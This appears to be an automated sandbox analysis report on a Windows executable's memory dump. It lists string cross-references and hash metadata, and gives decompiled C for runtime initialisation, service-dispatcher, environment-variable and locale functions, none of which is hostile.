E, xrefs: 00A31FCC
M, xrefs: 00A31BA4
u, xrefs: 00A321EE
@, xrefs: 00A31A46
2, xrefs: 00A323A7
?, xrefs: 00A32405
U, xrefs: 00A31AE0
U, xrefs: 00A318CC
h, xrefs: 00A32058
E, xrefs: 00A32185
U, xrefs: 00A324F1
E, xrefs: 00A32471
V, xrefs: 00A316B1
A, xrefs: 00A325FE
j, xrefs: 00A31C84
A, xrefs: 00A32551
*, xrefs: 00A32399
H, xrefs: 00A31990
^, xrefs: 00A31C7D
M, xrefs: 00A3251D
h, xrefs: 00A31E2F
*, xrefs: 00A3226C
U, xrefs: 00A31C30
4, xrefs: 00A322AB
H, xrefs: 00A319E4
E, xrefs: 00A31A69
S, xrefs: 00A31C5A
U, xrefs: 00A31D56
h, xrefs: 00A32479
h, xrefs: 00A31F86
v, xrefs: 00A322B2
E, xrefs: 00A31B3B
u, xrefs: 00A32561
E, xrefs: 00A319BA
E, xrefs: 00A31B5E
*, xrefs: 00A322C7
P, xrefs: 00A31FEF
], xrefs: 00A317B4
j, xrefs: 00A31C6F
V, xrefs: 00A3214D
0, xrefs: 00A31F71
*, xrefs: 00A3229D
f, xrefs: 00A31D2C
0, xrefs: 00A320DD
r, xrefs: 00A32465
h, xrefs: 00A321C4
E, xrefs: 00A31FFD
P, xrefs: 00A3207B
2, xrefs: 00A32322
Q, xrefs: 00A3236F
r, xrefs: 00A325A7
$, xrefs: 00A319EB
u, xrefs: 00A31D3A
E, xrefs: 00A31D1E
[, xrefs: 00A324DD
M, xrefs: 00A31927
Y, xrefs: 00A31B11
U, xrefs: 00A32501
;, xrefs: 00A31B34
%, xrefs: 00A32281
M, xrefs: 00A3197B
V, xrefs: 00A31E9F
H, xrefs: 00A31A93
2, xrefs: 00A323F5
f, xrefs: 00A31D48
d, xrefs: 00A31D9C
1, xrefs: 00A32384
P, xrefs: 00A3200B
j, xrefs: 00A320F2
E, xrefs: 00A31D8E
u, xrefs: 00A32089
+, xrefs: 00A32481
>, xrefs: 00A31775
h, xrefs: 00A32154
s, xrefs: 00A31AA1
j, xrefs: 00A31FA9
s, xrefs: 00A325AB
3, xrefs: 00A3223B
_, xrefs: 00A324D5
H, xrefs: 00A31863
f, xrefs: 00A31D10
, xrefs: 00A31943
h, xrefs: 00A31E7C
}, xrefs: 00A321A8
F, xrefs: 00A31736
U, xrefs: 00A3169C
M, xrefs: 00A319F9
R, xrefs: 00A31B03
Y, xrefs: 00A31B2D
W, xrefs: 00A3212A
j, xrefs: 00A31C99
_, xrefs: 00A317A6
V, xrefs: 00A31EFA
f, xrefs: 00A31D64
^, xrefs: 00A317AD
E, xrefs: 00A31824
M, xrefs: 00A31878
;, xrefs: 00A32257
:, xrefs: 00A31E8A
M, xrefs: 00A31D72
U, xrefs: 00A318FD
u, xrefs: 00A31CCA
<, xrefs: 00A3186A
s, xrefs: 00A32411
V, xrefs: 00A32525
E, xrefs: 00A31839
O, xrefs: 00A31C76
M, xrefs: 00A31B73
W, xrefs: 00A316F0
E, xrefs: 00A31912
A, xrefs: 00A31B96
X, xrefs: 00A323D1
C, xrefs: 00A32066
K, xrefs: 00A31E36
0, xrefs: 00A31DAA
3, xrefs: 00A31C06
,, xrefs: 00A32439
+, xrefs: 00A32535
*, xrefs: 00A32431
M, xrefs: 00A31ACB
w, xrefs: 00A31EF3
f, xrefs: 00A31D80
=, xrefs: 00A31E83
X, xrefs: 00A31894

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$GrayMessageOpenProtectStringVirtual
String ID: $$$%$'$*$*$*$*$*$*$*$+$+$+$,$-$0$0$0$1$1$2$2$2$2$2$3$3$3$3$4$:$;$;$;$;$<$=$>$?$@$@$@$@$@$A$A$A$C$C$C$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$H$H$H$H$H$K$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$O$P$P$P$P$P$Q$R$S$T$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$X$X$X$Y$Y$Y$Z$Z$[$]$]$]$]$^$^$^$^$_$_$d$e$e$f$f$f$f$f$f$f$f$h$h$h$h$h$h$h$h$h$h$j$j$j$j$j$j$j$j$j$k$r$r$s$s$s$t$u$u$u$u$u$u$u$u$u$v$w$x$|$}
API String ID: 1346567926-4070662442
Opcode ID: deb2e2bcf6fa73a431f3754afc73b647d327fc573180b067bd6f6ad6aeb1654d
Instruction ID: 4bdd80a7e16d4b3a65ea6b830209abfd7a0754a0eaf026825071fbf57a0ecd5d
Opcode Fuzzy Hash: deb2e2bcf6fa73a431f3754afc73b647d327fc573180b067bd6f6ad6aeb1654d
Instruction Fuzzy Hash: 06C28A2090CBE9C9DB32C27C8C587CDAE611B27325F5843D9D1E93A2D2C7B50B85DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00A33613, Relevance: 12.2, APIs: 8, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00A33613(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xa4e098);
				E00A34010(__ebx, __edi, __esi);
				E00A34934(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141); // executed
				_t82 = E00A34B0B(); // executed
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xa512a0 = _t82;
					 *0xa531a8 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xa512a0; // 0xaefa50
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0xa512a0;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xa53100; // 0xaf0258
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91); // executed
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -10818196
											E00A34556(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E00A338BE();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E00A34055(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0xa531a8 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E00A34B0B(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0xa512a0[_t149] = _t138;
							 *0xa531a8 =  *0xa531a8 + _t141;
							__eflags =  *0xa531a8;
							while(1) {
								__eflags = _t138 - 0x800 + 0xa512a0[_t149];
								if(_t138 >= 0x800 + 0xa512a0[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xa531a8; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0xa512a0[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E00A34556(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E00A366B0(_t155, 0xa50e80, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}

0x00a33613
0x00a33615
0x00a3361a
0x00a33621
0x00a33629
0x00a3362c
0x00a33630
0x00a33631
0x00a33632
0x00a33639
0x00a3363b
0x00a33640
0x00a3365d
0x00a33662
0x00a33668
0x00a3366d
0x00a3366f
0x00000000
0x00000000
0x00a33671
0x00a33677
0x00a3367a
0x00a3367d
0x00a33686
0x00a33689
0x00a3368f
0x00a33692
0x00a33695
0x00a33698
0x00a3369b
0x00a3369b
0x00a336a6
0x00a336ac
0x00a336b1
0x00a337e6
0x00a337e8
0x00a337e9
0x00a337e9
0x00a337e9
0x00a337eb
0x00a337eb
0x00a337ee
0x00a337f1
0x00000000
0x00000000
0x00a337fc
0x00a33802
0x00a33805
0x00a33808
0x00a3381c
0x00a3381c
0x00a33820
0x00a33822
0x00a33829
0x00a3382e
0x00a33830
0x00a33830
0x00a33824
0x00a33826
0x00a33826
0x00a33834
0x00a3383a
0x00a3383d
0x00a33840
0x00a3388e
0x00a33894
0x00a33897
0x00a33899
0x00a3389e
0x00a338a0
0x00a338a5
0x00a338a5
0x00000000
0x00a33842
0x00a33842
0x00a33844
0x00000000
0x00000000
0x00a33847
0x00a3384d
0x00a3384f
0x00000000
0x00000000
0x00a33854
0x00a33856
0x00a3385b
0x00a3385e
0x00a33868
0x00a3386b
0x00a33876
0x00a3387d
0x00a33881
0x00a33886
0x00a33889
0x00a338a8
0x00a338a8
0x00000000
0x00a338a8
0x00a33871
0x00a33871
0x00a33873
0x00a33873
0x00000000
0x00a33873
0x00a33864
0x00000000
0x00a33864
0x00a33840
0x00a3380a
0x00a3380c
0x00000000
0x00000000
0x00a33814
0x00000000
0x00a33814
0x00a338ae
0x00a338b1
0x00a338b6
0x00a338b6
0x00a338b8
0x00a338bd
0x00a338bd
0x00a336b7
0x00a336ba
0x00a336bc
0x00000000
0x00000000
0x00a336c2
0x00a336c4
0x00a336c7
0x00a336ca
0x00a336cf
0x00a336d7
0x00a336d9
0x00a336db
0x00a336dd
0x00a336dd
0x00a336e2
0x00a336e2
0x00a336e3
0x00a336e6
0x00a336e6
0x00a336ec
0x00000000
0x00000000
0x00a336f8
0x00a336fa
0x00a336fd
0x00a336ff
0x00a33799
0x00a337a0
0x00a337a0
0x00a337a6
0x00a337b2
0x00a337b4
0x00000000
0x00000000
0x00a337b6
0x00a337bc
0x00a337bf
0x00a337c2
0x00a337c6
0x00a337cc
0x00a337cf
0x00a337d2
0x00a337d5
0x00a337d5
0x00a337da
0x00a337db
0x00a337de
0x00000000
0x00a337de
0x00a33705
0x00a3370b
0x00000000
0x00a3370b
0x00a3370e
0x00a33710
0x00a33715
0x00a33716
0x00a33719
0x00a3371c
0x00a3371c
0x00a3371e
0x00000000
0x00000000
0x00a33724
0x00a33726
0x00a33729
0x00a33786
0x00a33786
0x00a33787
0x00a3378d
0x00a3378e
0x00a33791
0x00a33794
0x00000000
0x00a33794
0x00a3372b
0x00a3372d
0x00000000
0x00000000
0x00a3372f
0x00a33731
0x00a33733
0x00000000
0x00000000
0x00a33735
0x00a33737
0x00a33747
0x00a33754
0x00a3375b
0x00a33760
0x00a33767
0x00a33771
0x00a33775
0x00a3377a
0x00a3377d
0x00a3377d
0x00a3377d
0x00a33780
0x00a33783
0x00a33783
0x00000000
0x00a33783
0x00a3373a
0x00a33740
0x00a33743
0x00a33745
0x00000000
0x00000000
0x00000000
0x00a33745
0x00000000
0x00a3371c
0x00a33655
0x00000000

APIs

__lock.LIBCMT ref: 00A33621

Part of subcall function 00A34934: __mtinitlocknum.LIBCMT ref: 00A34946
Part of subcall function 00A34934: __amsg_exit.LIBCMT ref: 00A34952
Part of subcall function 00A34934: EnterCriticalSection.KERNEL32(?,?,00A32F12,0000000D), ref: 00A3495F

__calloc_crt.LIBCMT ref: 00A33632

Part of subcall function 00A34B0B: __calloc_impl.LIBCMT ref: 00A34B1A

@_EH4_CallFilterFunc@8.LIBCMT ref: 00A3364D
GetStartupInfoW.KERNEL32(?,00A4E098,00000064,00A3298A,00A4E008,00000014), ref: 00A336A6
__calloc_crt.LIBCMT ref: 00A336F1
GetFileType.KERNEL32(00000001), ref: 00A3373A

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 2621518576-0
Opcode ID: 477d6f1005ab1de80fe7cc195448dd3e3ae932f3625164616dff0e4e15bddec2
Instruction ID: 67091081a42ed103b98f1a8ce8223622670f956b5acc1939516c0dfd9dfb2402
Opcode Fuzzy Hash: 477d6f1005ab1de80fe7cc195448dd3e3ae932f3625164616dff0e4e15bddec2
Instruction Fuzzy Hash: 4681C2B2D083459FDF14CFA8C8416AEBBB0BF49320F24426DF4A6AB391D7359902CB54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A31450, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00A31450(WCHAR* _a4) {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				int _v20;
				long _t65;

				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					_v12 = _v12 + 1;
					_v8 =  &(_v8[lstrlenW(_v8)]);
					_v8 =  &(_v8[1]);
				}
				_v16 = HeapAlloc(GetProcessHeap(), 0, 8 + _v12 * 8);
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					if(E00A31160(_v8, _v16 + _v12 * 8) != 0) {
						_v12 = _v12 + 1;
						_v8 =  &(_v8[lstrlenW(_v8)]);
						_v8 =  &(_v8[1]);
						continue;
					}
					HeapFree(GetProcessHeap(), 0, _v16);
					return 0;
				}
				 *(_v16 + _v12 * 8) = 0;
				 *(_v16 + 4 + _v12 * 8) = 0;
				_v20 = StartServiceCtrlDispatcherW(_v16);
				if(_v20 == 0) {
					_t65 = GetLastError();
					0xa30000(_a4, _t65);
					0xa30000("StartServiceCtrlDispatcherW failed to start %s: %u\n", _t65);
				}
				HeapFree(GetProcessHeap(), 0, _v16);
				return _v20;
			}

0x00a31456
0x00a3145d
0x00a31464
0x00a3146e
0x00a31471
0x00a31481
0x00a31494
0x00a3149d
0x00a3149d
0x00a314bc
0x00a314bf
0x00a314c9
0x00a314cc
0x00a314eb
0x00a3150d
0x00a31520
0x00a31529
0x00000000
0x00a31529
0x00a314fa
0x00000000
0x00a31500
0x00a31534
0x00a31541
0x00a31553
0x00a3155a
0x00a3155c
0x00a31567
0x00a31572
0x00a31572
0x00a31584
0x00000000

APIs

lstrlenW.KERNEL32(00000000), ref: 00A31488
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A314AF
HeapAlloc.KERNEL32(00000000), ref: 00A314B6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A314F3
HeapFree.KERNEL32(00000000), ref: 00A314FA
lstrlenW.KERNEL32(00000000), ref: 00A31514
StartServiceCtrlDispatcherW.ADVAPI32(00000000), ref: 00A3154D
GetLastError.KERNEL32 ref: 00A3155C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A3157D
HeapFree.KERNEL32(00000000), ref: 00A31584

Strings

StartServiceCtrlDispatcherW failed to start %s: %u, xrefs: 00A3156D

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Freelstrlen$AllocCtrlDispatcherErrorLastServiceStart
String ID: StartServiceCtrlDispatcherW failed to start %s: %u
API String ID: 3118973391-2801566792
Opcode ID: 85ceb33fe8e0d554d75d0397dd483fb8997da5f362c75188dbfdca8e82f0e4d9
Instruction ID: 17bd649a3479068375f9a864750093ced17e91e8706c5da9866ba6bead7823c4
Opcode Fuzzy Hash: 85ceb33fe8e0d554d75d0397dd483fb8997da5f362c75188dbfdca8e82f0e4d9
Instruction Fuzzy Hash: 6241F7B8E00209EFDB14DFE4C954BAEBBB5FF88305F208199E906A7340D7359A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A310B0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A310B0(WCHAR* _a4) {
				long _v8;
				void* _v12;
				long _t25;
				long _t30;

				_v8 = 0;
				_v8 = ExpandEnvironmentStringsW(_a4, 0, _v8);
				if(_v8 != 0) {
					_t19 = _v8;
					_t9 = _t19 + 2; // 0x2
					_v12 = HeapAlloc(GetProcessHeap(), 0, _v8 + _t9);
					if(ExpandEnvironmentStringsW(_a4, _v12, _v8) != 0) {
						return _v12;
					}
					_t25 = GetLastError();
					0xa30000(_a4, _t25);
					0xa30000("cannot expand env vars in %s: %u\n", _t25);
					HeapFree(GetProcessHeap(), 0, _v12);
					return 0;
				}
				_t30 = GetLastError();
				0xa30000(_a4, _t30);
				0xa30000("cannot expand env vars in %s: %u\n", _t30);
				return 0;
			}

0x00a310b6
0x00a310cd
0x00a310d4
0x00a310f5
0x00a310f8
0x00a3110c
0x00a31123
0x00000000
0x00a31157
0x00a31125
0x00a31130
0x00a3113b
0x00a3114d
0x00000000
0x00a31153
0x00a310d6
0x00a310e1
0x00a310ec
0x00000000

APIs

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 00A310C7
GetLastError.KERNEL32 ref: 00A310D6
GetProcessHeap.KERNEL32(00000000,00000002), ref: 00A310FF
HeapAlloc.KERNEL32(00000000), ref: 00A31106
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000), ref: 00A3111B
GetLastError.KERNEL32 ref: 00A31125
GetProcessHeap.KERNEL32(00000000,?), ref: 00A31146
HeapFree.KERNEL32(00000000), ref: 00A3114D

Strings

cannot expand env vars in %s: %u, xrefs: 00A310E7
cannot expand env vars in %s: %u, xrefs: 00A31136

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$EnvironmentErrorExpandLastProcessStrings$AllocFree
String ID: cannot expand env vars in %s: %u$cannot expand env vars in %s: %u
API String ID: 3773870257-3849838887
Opcode ID: a596da2b11dfd62a6ba23cb35f8b274ade15af014f3d8f213697565f04870aa7
Instruction ID: 80103e0a7da1159158b82147fb89f1470f556d852b11bf43dbe37ae97c6fea76
Opcode Fuzzy Hash: a596da2b11dfd62a6ba23cb35f8b274ade15af014f3d8f213697565f04870aa7
Instruction Fuzzy Hash: 15112E79600108FFCB54DBE4DD59FAF7BB8AB89301F108548FA0AD7240DA319A519B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FDE2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3FDE2(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00A3F030(_t28, ?str?) != 0) {
					if(E00A3F030(_t28, ?str?) != 0) {
						return E00A410F7(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x00a3fde6
0x00a3fdeb
0x00a3fe13
0x00000000
0x00a3fe3c
0x00a3fe2e
0x00a3fe5a
0x00000000
0x00a3fe5a
0x00000000
0x00a3fe30
0x00a3fe58
0x00000000
0x00000000
0x00a3fe5e
0x00a3fe63
0x00a3fe67
0x00a3fe67
0x00a3fe35

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00A400A8,?,00000000), ref: 00A3FE26
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00A400A8,?,00000000), ref: 00A3FE50

Strings

OCP, xrefs: 00A3FE04
ACP, xrefs: 00A3FDF3

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: a79f3490a28ee434456ca6e845b0fcc64c9afd1233fdaae6a8847b8efecb90b9
Instruction ID: 0ed58161499d75495db4152bb3175adb63bac962769269eb58545d227beadc53
Opcode Fuzzy Hash: a79f3490a28ee434456ca6e845b0fcc64c9afd1233fdaae6a8847b8efecb90b9
Instruction Fuzzy Hash: 5B019235A21115BEDB249F68DC49FD737A8AF417A5F288036FD08DA062E761DA82C784

Uniqueness

Uniqueness Score: -1.00%

Function 00A34904, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A34904(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x00a34909
0x00a34919

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A398E1,00A4CDE0,00000001,?,00A399F8,00A4CDE0,00000017), ref: 00A34909
UnhandledExceptionFilter.KERNEL32(00A4CDE0,?,00A398E1,00A4CDE0,00000001,?,00A399F8,00A4CDE0,00000017), ref: 00A34912

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 697a869298344bdf918506d7455357b68ed835e234748a59486f863b47f240bc
Instruction ID: 0115ffb0c0dff591dae4e7d03122d9a968d31542ff990237d922c2d9b3edcbbb
Opcode Fuzzy Hash: 697a869298344bdf918506d7455357b68ed835e234748a59486f863b47f240bc
Instruction Fuzzy Hash: 07B09239044209ABCA806BD9EC0DBCF3F28EB8A662F104250F60D440608B6354628A91

Uniqueness

Uniqueness Score: -1.00%

Function 00A3928D, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00A3928D(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0xa53178; // 0x2624e6fc
				_t6 = _t5 ^  *0xa50e80;
